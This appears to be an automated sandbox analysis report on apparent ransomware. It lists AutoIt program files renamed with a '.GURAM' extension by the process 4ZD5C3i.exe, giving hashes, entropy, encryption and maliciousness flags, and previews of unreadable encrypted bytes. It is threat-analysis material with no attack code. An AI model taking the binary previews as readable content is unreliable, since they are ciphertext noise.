                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):44736
                                                                                                                                                                                                                                                Entropy (8bit):7.996164594668912
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:768:puQDdgstsStw1VLdfnNiNiKydFmtqcexHqvOpEciPear/xAw:hWsyVVxViNifdUFe5qkuHpj
                                                                                                                                                                                                                                                MD5:461B3719372167921392378576C85C4E
                                                                                                                                                                                                                                                SHA1:ADA3435A8C0962C58D4CE380BF1CF809C2471BAB
                                                                                                                                                                                                                                                SHA-256:7B919A29888C2518A8B4F55095B37A773C15449B112E41FFA453EAABD9E7ED57
                                                                                                                                                                                                                                                SHA-512:4265641FBB47C64271DA9E934209B10E8F3D455D0307DAC7F01AA2ACE5FC8AE4ECC0484F1637BCA091B65AE3B2CF5C4FEE1AAF6D5659AD8F6C2CAF3D47089388
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...P8.S.5.@.[k.}@p.. .V......x.1(...NZv7.....W.{....=.Q"D...m.x.}.....q..f.5.......^..O.pM%....@*.Y.J.....i...`d.z...>$Rl...`.Kq......y5...tr...^%.$........P..1:.i.....u_.%.5_H.....d..j.(*.:.u!.o..V1..9.d.I(\B.....kM.`mH..o...iu.#..........C>...<..[..;........wG.\^..R..9.%..i2.F.....q.<..@g.&-........<.(..Fs6.R.!.=....,.u&.$..X..&t4&1d..qB.i..l....e...i5*E.4.vf$DbE".)n>n...6f.V.../.....8...v.<...:.{.t.b...O8a.".W!..-.ot.k......rR.x..(.[U.[.*....8..."...J..\...4..W..z.-..)"..f../ip.R9...z.A....t._..._..E....}1...Z..P..,..<..$T[..RQe'N....A.h.#^....@.6xud.{.....%.d..T..}.Q.I-.a..>A...3G.F...^...yO...s..{e.a....\....B"..G_...N.@5`...u....-.w.D.t.6^........r;......kB..R.B."1....O.....|..J.!...r.Nx.pm......Q"..B~............l5..A.....|A.#f.....8..HDThG.onx.SE.[.v...J....+. ..{..a....|^...+.5.. j....y"f....,5oC@.<..-.;.~....F..%...8QO.2..l....T...Q...P.gH...9.Y..r.TK..G.[0....Kq1...+0.Da}...E$..B...j..z...'..8.O.I=..7Z.<........"....3

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\AutoItX\AutoItX3.Assembly.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):50126
                                                                                                                                                                                                                                                Entropy (8bit):7.996620174185485
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:768:juRbugaSHsiB0anEkCZCnjvcA1Y43EdwuEIxB45GFIct4VuYznMoqrmIycsaoi:q9laSVnqgcAYdPTxB45SZmXqV
                                                                                                                                                                                                                                                MD5:D9E3861CDE14D73BE537EEEAEE5F7AF9
                                                                                                                                                                                                                                                SHA1:6B62A0C5F044227A4D74685F74C50539CB2E9D78
                                                                                                                                                                                                                                                SHA-256:9F66E6BDCB2454D5DFF1640B4FFBEC14AD9AD013CD1C7257AF1C7659F4E1F405
                                                                                                                                                                                                                                                SHA-512:AF77C50280DA092CA0DE505A5003D10DF038A8CC5498D2AB623C61C558788704B5E7FFDE7A2B0D04EA8C87B83C1AFB7E423F0956ABCD41DD3FA6F9B7E123A585
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:|...... N......w.K..........1.h..-.O..c9h.Zd0..9.$....:.O.X.b^l....xWv./.WS...|.......Nx.....f......+..b.&......6.#.-cS...1...@P>#B..... .br+.MS..N..b.....B"drN...1.(......rE..A.r..Hd.F..k.W.8...Zi..!.K.#.)............r|N.,p....7N...*:..p.."FoP......n...M3|..n..5..*...Z<3*......4a..~.`!N.5G.cq...W..E....?..........\..O.;._....b:b...Kg_A+,.=..Ql....Y_..W...!9..nR..YOw.O.....^r@d.v..R.}(z..|t.l3%...Z..s.......v}t.T:G....s=..l..T.v...lq....._^.~nLoVlf\....t../.2WO.0..8U.#.,}.I......s....._h../*.n.yT.Km..l.YC..*...t{^..4...H..%..$.......\.,p+~....Ht|e.m..8j..8.......9o.9.`P-:.+....|Fu5.[,.M.mq.5..... M.$*...(..z4.Q...7K..]mI.,..C.v.D!cz.....p0L..T..i.D:..v..bOic[...E....2.K....k.?....{.x.4q..._aH..Fn.dd.ah..../.R..7.[D...Zh..?....D.z.......S....)4k.K..)."...$.tV....%.}.p"..\....w..:..<Jg5V...DN....{........y.FB#.,[..L.f'..m.z..D#...w.U...*.u..$S."4...3w......Y+.5....d1o..`.....s.$FY..<...9.9../Z...Q..OGl....`.J..#b.....,F..+..@..nO.

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\AutoItX\AutoItX3.PowerShell.dll.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):53952
                                                                                                                                                                                                                                                Entropy (8bit):7.996613411693819
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:1536:kmue3IhSCi6omSLYH6ncROxkiDghcWtLzGqO5xw:lue4lK5HcUy8lWR2Lw
                                                                                                                                                                                                                                                MD5:3B627CA27994A6DF800F5B5C6B0040B2
                                                                                                                                                                                                                                                SHA1:560FE09C440A81E0C7F11DBD8875C11EF80BBDF5
                                                                                                                                                                                                                                                SHA-256:4C7B7C2185A1C068EDB5DBB5406AAD28A58F6FCBCE2FB586AC4B27142F9EFFA8
                                                                                                                                                                                                                                                SHA-512:B5B5ECD6D3E6C5A39CE639F1D4758754A9A931CC5D6859BBCD00DECAD6EDD63B90AA3EE9A5963C3286FCF19D64775B9C207E9B9F1B54E3379C0119DDA5F42A2E
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:-A.f.C.V.w.I".QBX2b..L..'"^..&u.6 .....".U$C...>.._...2..|,....J...p.|77Z...X|...d..d|...DCu....v*..,Ck.....c.0.c. .......B......E...lIQ...V..9Fa~...]7.....l.Iza6....@.;.......9...".W..O+.+...V9.l.qH..e..7C..$.M.E2......A.....>.T.w..UT.Va......U......v.....J34o<.t*.p.1s.GEm.....T..<T..m...yr..d.&l..Y...d7.)...r..<W.........Lm.(.[..5.s.e..K..g.._....\IUB.6=...P..Z....C......O4..J......................YZ.g)>.t..}..+.y.Y.<..f['...g.h.k.g.Z....u^.....J..t..Q.'.`=..E[~.t.....n..#....Tq.A....M...i......|.X.gh..0D-\.'=...W$.]`%..Z...e.".9.".x1..#LI?...6g.h6<....\bN%..(...ZP.lw.bI....[..g,f...X.&....Y.a...q.pT.L.X5=o.l`g&.L@.zH....xk.'x.S....0s..A.&.>_..[.nO,T..q..d3...&.e..j.0.D3....~fH.o2^.Fd...'..VR<t...^...`;..O.d.arIF.x.o..Y'A ...H......M.]5&..H..l..W?jS.....5Xs.$v.8L.."....\.+.P^...F&.Q6....K ....+...<....>.............i.L...A.P..5HP...-.>%....m....z..{JD.+/.pbg..t......X.Pc}.V..!.{..o.b.h...%x9.t..~.....O*........d.=.KO.=..

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\AutoItX\AutoItX3.dll.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):727248
                                                                                                                                                                                                                                                Entropy (8bit):7.544616853533055
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12288:axNsLJqtSgY2/xE/TfXA0F1ll7I4zXXRpR4uBkrdyW84lohaMMsmOgSvY1:arsLJgSbWxyTfXAGRCrsHbmjSg1
                                                                                                                                                                                                                                                MD5:D226E91CF45282617A46F2BAAAD24D12
                                                                                                                                                                                                                                                SHA1:ED03DF40CBC89ED90C4E142A033D8432C16AE3AE
                                                                                                                                                                                                                                                SHA-256:800E72CA0C9291E1844B938C007C3A684548BE787266AFCCAADC48AC9BF253B6
                                                                                                                                                                                                                                                SHA-512:82448CE5930E3C6DF567A5E59A6CD29F008A65852C842F02BA75C1D2DB8EAD02D5826BA6FDE3C3354883ABAC2AD055F68A95613B71DF9E89E34E853BDD9B2CB7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.W&..`..6"..M..}r....,..2........v..z..!..A%....&.E.!},...0V$/....:.r.!.w.sN...N...Q....9..D..0Jx..@D(.....(....0:._LU.{..M.=^)..O..a[uCq$...4......eV..yr........._.|...wX^c.h$.b..p.t.~. ...'#......o.r%..o...9.J...6....t.)..Q7.7(.){"]..X.X$[..-Y.[+..H.@... ...%C2.F...^.T.% 7.C...&.>..b..UyV./$j.~8...wu..F?.!. ...r|.%...]......w....x.-'[.g+.W&.$...[a%.e.tb.(..\.g.f....c:m..;.\......h..'.....i..H.m......l.`.n..6s.....W......8..$.Z[(5.>,.K.X "$.Y...?...".0Bb..M...xC...u.|}`..\.........y^......).?.s.....)...;..z.....W..v.#M....n....C..E3..L.F...y@.&t..b..W. 1*c..rF`-.gD.@bi.xKo.O...gyIA..ds./........M6.NS...9(..w...*.~....$..=*..k9.{IIB..8.n..8q+....Z..6...8..kY39.){....n.!Y.$f._...yZ...>.l.......w.85ZZ....k./....K..".8A2@_.@...3N..T0t{.xA.u}# .\.`.&Z..g[..K.....(..g..Do......mTC.5...T....S.W.Y.aE.:...i.^?L'."h -*.q.d....hu#!Y...%/.-..>..xf z.j7....Ij..........&....p.R.5...@.....|....%...G.G..t%...6.....p.&.R1v.ky.Z...^.j.,..z@.....1.&(.>.

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\AutoItX\AutoItX3_DLL.h.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):13601
                                                                                                                                                                                                                                                Entropy (8bit):7.985578175169819
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:j2jylkCJue5NjyMz2TYtIX0ziNDMNeNWcaUAr86d80:jqeZjy2oEiDwOaLNG0
                                                                                                                                                                                                                                                MD5:8A5B1624397BC7FE5F3D2261BBBCFBD1
                                                                                                                                                                                                                                                SHA1:5FA36CEC5E2382EBDD6061BF0B9BB2DB3346AF66
                                                                                                                                                                                                                                                SHA-256:9112B53E8BAC553B709AEAE0B37B9C42E6FDB202B2384CD387B574DC8B862CCF
                                                                                                                                                                                                                                                SHA-512:C3F1844D30C245F24E2AEFC73501121214D3F1204B0C6B2FFB9D195EB5626EC83605942D8A260521CB804CF2CEC1EE540DDAD36D08552F453B64C1E42311916A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.) .;....y......&B..rY..9_c.t..). ..R.j.f.-^..._.b}.\...D~].At.e.V..n.c..@.....#..po`:..I....T(...z....p.I`........q....<`.NC....#l..8.bO3..(.....(s..e^@.;U.....TG=A.l ...;...L..F.......o.\}sj.$.....G.t..........Ue....E....X..0$..\.77..%.@j..{_l........i<D..Qo....W.....x.1.k...zk..Ex.pQ..a.oeV.9|.JN...B.....d"......../..v.N]N6~....>..$.(V,cyN_^d!..B|f.Ob.O..J.8..e..z....P..8...xD.e|.7..x.k..2.:..Mg....*.X@e(.5.?.F.{.%.6...B.......l"..O... .[i@]vrJ.....c....?Ql..E..*).PJ..O^..,.l..-o.~N...........s#.P.x.......M.`.4...Q..}......1...4....Lr.J.-..G...A*-.z..9.e....k......5..z.u2F...`.7..|...x.c..l.....M.x.#..a......^el..J..kT.7..M?..`u..T._.\..I.?.v'..N.LJ..lS.....$kBl!g...p7.m....`..#m...p....r.jp.\.>...@.*..qx..'....6.Nq....y....50}-...KR!T-..w"y;wX..>..w.......w..W..."\...8HG...}9...R].......@.^~p..y...m:.LC.|.D.L0..:o.q.~@.4}h..Y..8S*.?a+.HM....R..~..Y....."....[..5...|.X...AFb.I0n.U..b.nY .VX..].].J.GV..G.sQ"...b:.&...n..J..bPh.KK_.H..K..x.LN^..

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\AutoItX\AutoItX3_DLL.lib.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):29584
                                                                                                                                                                                                                                                Entropy (8bit):7.993125707151715
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:768:PltxTjQfY5pOi1bQ4J6SEIuGtVtgggXiZrCrotE:Pl3oE8i19ofGtLuilCrB
                                                                                                                                                                                                                                                MD5:5E0E1F2A8F1609D2B7A8EBF79AEA58A4
                                                                                                                                                                                                                                                SHA1:C25E45344E51BECBCD2F512DCA286ABDEC90FB25
                                                                                                                                                                                                                                                SHA-256:91249D0423459E2280BF80B96CF0FB1A7237027499D89B66E3542265099E6E89
                                                                                                                                                                                                                                                SHA-512:F213F0DAFF28723AB312567F883FB7069A86369CFCAA7C12C0F764FF9FA29938AF0CE964B8AB8583E2273A2A8A00AA259EFDDB22CBFADB3EB3082668BED64DBA
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.h....e...U.b_..?..*[.........U..@I. ..<AAqYRLE...B."........L.D...6..u....(...a....}.....+o...v.s........4U...V..>....c......>.....I.9..^.&D(pLW..;[.n..*....8:..Po.........3M....+.....f@.9.]...,...$\?..ye.C.+.p.....g..*>..?..Gh...<..N..g^..}..e1.K..QsB....$..)~.<...5...}.,. .S..*.N....oc`.. .K.,....V.a.n.(..q.~cj.#...z.B....h=.:4.!..K..q.G.1q....thc'I..4.B.N.C.@m_r.#.....8$,..!|..Q...s.0.G....r...8r..w...(..e.4..,...ew.. ..56p..2^6z...<...8.2...`fLm[.M...D...Vw.....Wv9...C......5.x.T..!/s...59.Y....N2;..+.z.#)r.m(+/.....a.IJ.N.s.bM^s..a,.l.#.^d..d.s..4...q....[....$D..1...|.bI..(S..W...0..%@.........."ige..`.}....R..l..W.yV6.SG,........`..........Jf..@..>).S5..U/.l.Q..1.......VGo.Zy..?.B..Z....I.t....%..+...._.b ..|H...@..+< .m.0.V.....)T.Z.&.....n.R.0=......XA&,Y>L.QL.b..`....Hs...T[B.cPWz..yH)..z.H...Er..sv&..,.8lA.V...Qq......N|..c.S.....s.....s}..~.!..nG...s.W..;J=%*.8..n.....6..O..I.............@/.TC....p.u...F....b.=LY.M...,.....

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\AutoItX\AutoItX3_x64.dll.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):921296
                                                                                                                                                                                                                                                Entropy (8bit):7.159692274985754
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:ZXEA6Zu3WYB0yRV0GZzcgyxUbCPnImH52jW5dE6Z4Mabo:CLZsWH+V0GuHMjWomaU
                                                                                                                                                                                                                                                MD5:C93E6601266EB7C6A9CC1779E55EA2DB
                                                                                                                                                                                                                                                SHA1:549966CCE53A8C00E9AF8BE3ADB2179FC870EF80
                                                                                                                                                                                                                                                SHA-256:E6F3A12A3F8D30CC3378A5D22AA618224EEA3BC51E1ADCEF9FD3D7215F9235A8
                                                                                                                                                                                                                                                SHA-512:ED761D9254BAA8587CCE82CB48349E4A64CFC31D528DBEBEF0211E2B604417BF3BB478C9BF56CC9DD9B71F9A46BB66446406B92930CF8A764AFB3B18A840DF75
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..z..0...YY.`....[...}..2.....N..<.....m...a.P[..*L.v.A....e_...L.}.".Y.........x....$..A...H......a..5.0I......u.$......b.3J.}d.t.HF...F....S.e..+ZI..../E'p.....rDy.....R..&{...-....<h......o}....)..KF7Vt.....nC..x..u....A..H/.].....i.lU9.5.....?.2.c&.[O..-......I..C...,k.........U[...-.0!N...G...I....?o..........O.&.....%.]<.+.....<.&..h!i....s..(V_.T.......kA;.IV...N0..$4Bm`.l...u....v..I...@F2.=.3...{a.....^.....e......uz.Y....e....}.Iw~.?<...T..,....`....O.3..OU.|w...(.......se.0H.....m....dh.v..B]2,..~..]..A...'.'..>;@..E..F.*_.u.ZY.7.Y.+....`&.Vd,J.%..X.[.h.7./......Q..5......y.x-..A~?.....j..........O.O....C..\....X.=NlN..}x@....D.<.<.........../7.)...\..zN.....BE......tL/a...#.a......do..s...E@..3C.o...'.....4.......:J...l'..4M.......G\..<n..}..+.............a|Zu%N.E....R-.....wW.~.s..d..4.........B..jB.v;..E....y...n...=.[....E..R..@,s...8..#...?...2P........"_``fez..b..(....#..P.`...r."m.Q^@]C."......no...L.Z....$2.....].

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\AutoItX\AutoItX3_x64_DLL.lib.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):28154
                                                                                                                                                                                                                                                Entropy (8bit):7.9941771939413435
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:768:qUFQHLMWMFYRST/RbawLVq6cZ9DQ5IS4ic:LFQHoWMhT/FawLVq601QOd
                                                                                                                                                                                                                                                MD5:259ACBB9FD4FE30714F412885C1D8FE7
                                                                                                                                                                                                                                                SHA1:FD7DAF0302C33934C908CE9793FA5CE2E64EAECD
                                                                                                                                                                                                                                                SHA-256:ADCF132E7E4F98E1134E09C55A5B1EF5D1EA076DC315CCFF999BCD1568B67122
                                                                                                                                                                                                                                                SHA-512:EBD64F16553F4BBE0BFF7BE92DFB8D14A892FF39CF8F6DB3262172F6F08F55B8653CCC3248D3218EE43CE8AED31FBB9895ABA7DBACD8D8C9C043BE4931BACECC
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:5'..-.*...- .KL..#..6.iR,<Z.....`.qa.b..%....g.p'}....cx.s..b..G.h.3u..:......8[cv...x...<{....7...A.q.!..<[i)T.J.J..B.*..*..Qwu.yV..D...%E.!i.M.d..G..c...{..P..u.....P.....[~..m$Z.0JU.v.O+|.....(.......^.3.0.gH..1.....C0....@..Fz.=......=w.G..zf.....4....w.y'.]S.:'....o. .......R.V'sf.....&.'.v#...r.W......%..gJn..`..B.7.r~6g@?4*|..P.0'....Uv.X.........F.wZ.....KY.#..J....9..0..eF=...[.....[a+.e5Z.n...@.T.........."....=.M^a.!....m.>..;....1.9....Q~9.B..5Y...a.k<u:.5.~k+0.....8.:.a-$2...m..+S...3.....5......cMD...o.I..8.....l_h.Q..s....4.S./.V...............&..z{.$R.f.F....."9i.h.z.GjZZJ.>..J..G..P.p.U.'W...*."Q........3.sR...YZ.P/.-W.X.u....K....,..^...5c=....!.Z.~_.......e...M.9[...E.....7...B..A.=.K..B.../..C`..>RmV.?...T....E..%.n8^T..g.B......H[..d.c....Y..(R...5.[.i.yr..'5.l[6J....o..]qD.....O./......YC..{..m....z....<.....6 .\..].r.._. .tp/...+.......M.l.7........>.e?......[.E...)..,......)+.iG)..8k..p.$..f..Yw.A9....x..-..T.

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\@OSLang.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1781
                                                                                                                                                                                                                                                Entropy (8bit):7.882086994988941
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:ESDGHa5crnJzCL0khs2cYxk4yZo34o0jZtwq:EVHmOJzCL0khssxkrleq
                                                                                                                                                                                                                                                MD5:86604CD773C41757D74818D3A741EE5E
                                                                                                                                                                                                                                                SHA1:C10ECB25D3804FE2DCC3599F5A0609550F3F1A2E
                                                                                                                                                                                                                                                SHA-256:535D0198067BFF67CC7BBF8A4283737B6D756B0C3741AB3035E6370F1688F136
                                                                                                                                                                                                                                                SHA-512:3A7D44EDCF5A43959EDD2668767964F7B0A319A8E78A2A7DF150FCA2A6EEA5A1991471736456101E47571F0BFED8CE06A7F8D2B53A330F23635EE6F9C735F9DF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Y0P....~..J.....GE+..8..N0...f....h.8.O.&...-...5K.V3.[.?..@.p.....t.L-4^.....8. Lh..wN...5...V.......p......kK.,.ktF.(.).....v...hD1..'.4....\-.b...F"....g...5....jM........+_Q?yF..F..%......uQ..E.e(n.;u.Z}.v....Squ....8.]..0..l....Sl..u........&...=..R..4wo..T...x."J.@.o..Ju..f..0c...c...T.X.....21...Ya..p;...i.&.g.\.I..U)n|.j..J.......lX../ ...id.h|v...M.q.A...:..u7..L,$.G.-Xml..Ky.p..:./..C..]....}.d2w.c..Q.[...... .VQ.}...J...N....`a...W.......H...;.....t>\<....h....ah...a.a.i\..G..".r.y...xn..k.s.h..AU..UCy.e.Rb.h.z...D...z...N...?wGcW.O.,....P.,.....j.#.!d.i.....?[...-}6..T{.0...6.d.,.... Y......5.=(W0**...Y.L..E.Pt.9..1..Q.@....5c..H...W;4._.~..3......;......yw}.....Gg..,J...z...o...Y.E+......[r....3...b.t".D3......s.=.b...PK.g=/N>.Agn^W....ak.........9n.>".<l...P..f..*...5.C8..D.*'.p.p.x.....|.LE.. .n.yV...56..9....;.C*.......3.0~.f.....WD....l.1R.A8...".7I]D..].P..NY.....m....'.m..`.T.<.\2.....c8..x...zhb........Zu...wD..O.>~L

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\ACos.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1263
                                                                                                                                                                                                                                                Entropy (8bit):7.835754031405204
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:PPX9KKrhcztkANuFQ4SdW23IgFmjmJrc0YXUZtwsTHpc:nX91+pkSuelW2384o0jZtwAG
                                                                                                                                                                                                                                                MD5:B2329A4241CFF216739591273E3FACE3
                                                                                                                                                                                                                                                SHA1:29916377425779EE3B98A7EB23FDBEC2A9DD3AB5
                                                                                                                                                                                                                                                SHA-256:7637210E9C74C905656142EB5273BFBFDE5F90E4FB307360683BC9C6151088D1
                                                                                                                                                                                                                                                SHA-512:795656BD111F33F7BB5A14235585DF6202A28E824F17E5352894AACE490F8AB260D25C61C427805922BB22C72CE89AE8EEF3DD061C5D4F52DF0EA4A2553F0803
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.A.z......X..$.K..Z.e....ct.a#..]..W.y./..s...).W..!...\:uXb...G.0..T?.......<4h.aC....GD.~..=..H..RJA.\-~..8..2.t.....}..(.X..{.@U..HT3|.V.X.T.b....>.........(*...Gh..x.2?t..aW..s.+....g1...ma!2FSB..#Ja....H(....#...A.>h.c.IE.......%J...S...:...!.. .3{....h.-x./!^..r.F.]N.......k..n.a.....6.r..;..$................W..%OhhI..54k...;.^Bt...~......W.....d.o......r....J......$.MS%b.J8?w...a,.#..0...O$...J..$...D|.B..~:.BZ.mB.a.K..8b..5.=.s..*....3..1.H..?.a......n.Bc....&..LYs!.-#.*....... .JD......Q..@|..~7.A....f.....L....I/....F..4a.L...(..c.....C.../0\.C.s.......jlu.5.P]...RI..g..,i........?....LGi42.......D....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'....

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\ACos[2].au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):813
                                                                                                                                                                                                                                                Entropy (8bit):7.6875903158358865
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:THtHugWbcG/XWzU6jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZohs:9lbokjmJrc0YXUZtwsTqfQM4
                                                                                                                                                                                                                                                MD5:5D540F528431F242A04FF2B337D50714
                                                                                                                                                                                                                                                SHA1:C9CF25B1BF4C606B9C5B5BB9C7E3B62A7F83B303
                                                                                                                                                                                                                                                SHA-256:9196B0F5803ABE00B2924BCEF2A31F7EB1AE93BC1E57DAE11C8BFB8C1AAC5003
                                                                                                                                                                                                                                                SHA-512:DD2DF3B0DAEE64485BE5DE113AC513890223359D2912DB8E19F63661F11450449823878DDEDD147029052A904E278C3ACC5F12A2397C10953453BBCB3B6A1C31
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.Sy...N........5....2B.....|".#O.&..\..M}..pI_....B..rp;/..|b.Q..5.m).SV..[.V........gPoP....f.=.+...3.u......:..6=;.<t....G|XSN..\B9.j*..h.u.X...@.E9...t.d%..`..rf......+......w......)......I..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$...:W.M.j5o..C$...S...f%..v.vKj......................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\ASin.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1260
                                                                                                                                                                                                                                                Entropy (8bit):7.845461406947237
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:sV0rI5ZZSuUaO0BqTMBvGwtzgsg9jmJrc0YXUZtwsT6:ZE2uUt0c+7gH4o0jZtwt
                                                                                                                                                                                                                                                MD5:466A0DC1A1352E1978CF0E0B4CA17C98
                                                                                                                                                                                                                                                SHA1:D7EDC880F9C21A95F6D543189A9765B6135035AD
                                                                                                                                                                                                                                                SHA-256:DBEC972DC70468E624309248C361CCF77C78FEC2085F8126BF60E5CAB2AFD173
